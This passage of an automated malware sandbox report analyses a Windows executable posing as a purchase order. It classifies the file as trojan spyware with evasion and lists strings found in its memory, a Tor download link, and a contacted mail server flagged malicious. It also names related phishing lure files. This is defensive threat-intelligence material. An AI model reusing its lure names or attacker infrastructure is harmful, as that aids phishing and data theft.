http://www.fontbureau.comessed | 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp; 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp; 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp; 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp; 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.goodfont.co.kr | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.tiro.comD | 00000000.00000003.248499503.0000000005699000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.urwpp.de.T | 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.sajatypeworks.com | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.jiyu-kobo.co.jp/ks | 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp; 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.258256920.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257256254.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257951856.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257160579.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257050058.000000000569D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257213807.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257382975.000000000567A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257294565.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/chnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://fontfabrik.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.comttvnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp//new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.galapagosdesign.com/DPleasenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.jiyu-kobo.co.jp/)new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/frere-jones.html8new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.fonts.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.sandoll.co.krnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.deDPleasenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.urwpp.denew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://www.zhongyicts.com.cnnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.287974260.0000000002761000.00000004.00000001.sdmpfalse
                                        high
                                        http://www.sakkal.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.290045970.0000000003769000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.282084634.0000000000402000.00000040.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000000.283151659.0000000000402000.00000040.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comtutanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.com=new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.fontbureau.com/designerssnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254877068.0000000005699000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/OsInew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.249804536.0000000005663000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.fontbureau.comsivanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://mail.kyowasecurity.com.sgnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.524762835.0000000003112000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.apache.org/licenses/LICENSE-2.0new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248903417.000000000569E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248877687.00000000056A1000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248865129.000000000569E000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.fontbureau.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292765423.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.285795268.0000000005660000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.galapagosdesign.com/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257088272.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257018883.0000000005699000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://DynDns.comDynDNSnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%hanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://KpGsSw.comnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000005.00000002.523008375.0000000002DB1000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.urwpp.deFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comVsFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.fontbureau.comzananew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252725051.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252931728.000000000566F000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.jiyu-kobo.co.jp/jp/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comanew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.comdnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256209853.000000000566C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254906163.000000000566F000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.256055028.000000000566E000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254979634.000000000566F000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.carterandcone.comlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.founder.com.cn/cn/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248332429.0000000005699000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              http://www.fontbureau.com/designers/cabarga.htmlNnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                                high
                                                http://www.founder.com.cn/cnnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248100348.000000000569A000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.248045051.0000000005699000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jiyu-kobo.co.jp/msnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers/frere-jones.htmlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253657790.0000000005699000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.fontbureau.com/designers/cabarga.htmlnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://www.fontbureau.comcomFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.255093562.000000000566E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.jiyu-kobo.co.jp/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.fontbureau.com/designers8new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000002.292992821.0000000006872000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.com/designers/jnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.fontbureau.com/designers6new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254671506.0000000005699000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://www.fontbureau.com/designers/cabarga.htmlrpQjnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.254533956.000000000566C000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://www.fontbureau.comdrsnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.253839535.000000000566F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/jp/OsInew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jiyu-kobo.co.jp/anew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250202745.000000000566D000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.fontbureau.com/designers/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252695500.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252577474.000000000569C000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252494210.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252547005.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252614032.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252799955.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252653993.0000000005699000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.252756029.0000000005699000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.jiyu-kobo.co.jp/VsFnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250729764.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250336903.000000000566D000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250373934.0000000005663000.00000004.00000001.sdmp, new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.250906706.000000000566C000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.galapagosdesign.com/3smnew order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe, 00000000.00000003.257184730.000000000566E000.00000004.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown

                                                              Contacted IPs

                                                              Public

                                                              IP              Domain                      Country     ASN     ASN Name                         Malicious
                                                              113.197.35.43   mail.kyowasecurity.com.sg   Singapore   38532   USONYX-AS-AP USONYX PTE LTD SG   true

                                                              General Information

                                                              Joe Sandbox Version: 34.0.0 Boulder Opal
                                                              Analysis ID: 532730
                                                              Start date: 02.12.2021
                                                              Start time: 16:48:50
                                                              Joe Sandbox Product: CloudBasic
                                                              Overall analysis duration: 0h 10m 0s
                                                              Hypervisor based Inspection enabled: false
                                                              Report type: full
                                                              Sample file name: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe
                                                              Cookbook file name: default.jbs
                                                              Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                              Number of new started processes analysed: 21
                                                              Number of new started drivers analysed: 0
                                                              Number of existing processes analysed: 0
                                                              Number of existing drivers analysed: 0
                                                              Number of injected processes analysed: 0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • AMSI enabled
                                                              Analysis Mode: default
                                                              Analysis stop reason: Timeout
                                                              Detection: MAL
                                                              Classification: mal100.troj.spyw.evad.winEXE@6/3@1/1
                                                              EGA Information: Failed
                                                              HDC Information:
                                                              • Successful, ratio: 0.6% (good quality ratio 0.3%)
                                                              • Quality average: 34.4%
                                                              • Quality standard deviation: 37.2%
                                                              HCA Information:
                                                              • Successful, ratio: 100%
                                                              • Number of executed functions: 79
                                                              • Number of non-executed functions: 23
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .exe
                                                              Warnings:
                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Not all processes were analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/532730/sample/new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe

                                                              Simulations

                                                              Behavior and APIs

Time | Type | Description
16:49:58 | API Interceptor | 614x Sleep call for process: new order TRICOLOR-6.45 TRICOLOR-6.3 TRICOLOR-8.1 TRICOLOR-7.66.......exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

Match | Associated Sample Name / URL | Detection | Context
113.197.35.43 | AWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exe | malicious |
 | SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exe | malicious |
 | urgent request fro quotation CONO GROUP LLC DK983746GT.exe | malicious |

                                                                    Domains

Match | Associated Sample Name / URL | Detection | Context
mail.kyowasecurity.com.sg | AWB#8001187 SHIPPING DOCUMENTS PL+BL+CI.exe | malicious | 113.197.35.43
 | SHIPMENT DOCUMENTS FOR 912 INVOICE - PL+CI+BL+ORIGINCERT.exe | malicious | 113.197.35.43
 | urgent request fro quotation CONO GROUP LLC DK983746GT.exe | malicious | 113.197.35.43

                                                                    ASN

Match | Associated Sample Name / URL | Detection | Context
USONYX-AS-APUSONYXPTELTDSG | (SA213-317L)_INHA_20211122.exe | malicious | 103.7.9.22
 | zhaP868fw5 | malicious | 43.229.194.252
 | lDawzTbABc | malicious | 43.229.194.215
 | juxSAmZoqx | malicious | 103.36.93.250
 | Ynffczq7m4 | malicious | 43.229.194.223
 | RFQ_LISTaugust2315.exe | malicious | 103.7.8.203
 | loligang.x86 | malicious | 43.229.193.74
 | TFG18FA4eD | malicious | 43.229.194.255
 | Order 824126.xlsb | malicious | 116.12.51.202
 | Order 161488.xlsb | malicious | 116.12.51.202
 | Order 824126.xlsb | malicious | 116.12.51.202
 | Order 161488.xlsb | malicious | 116.12.51.202
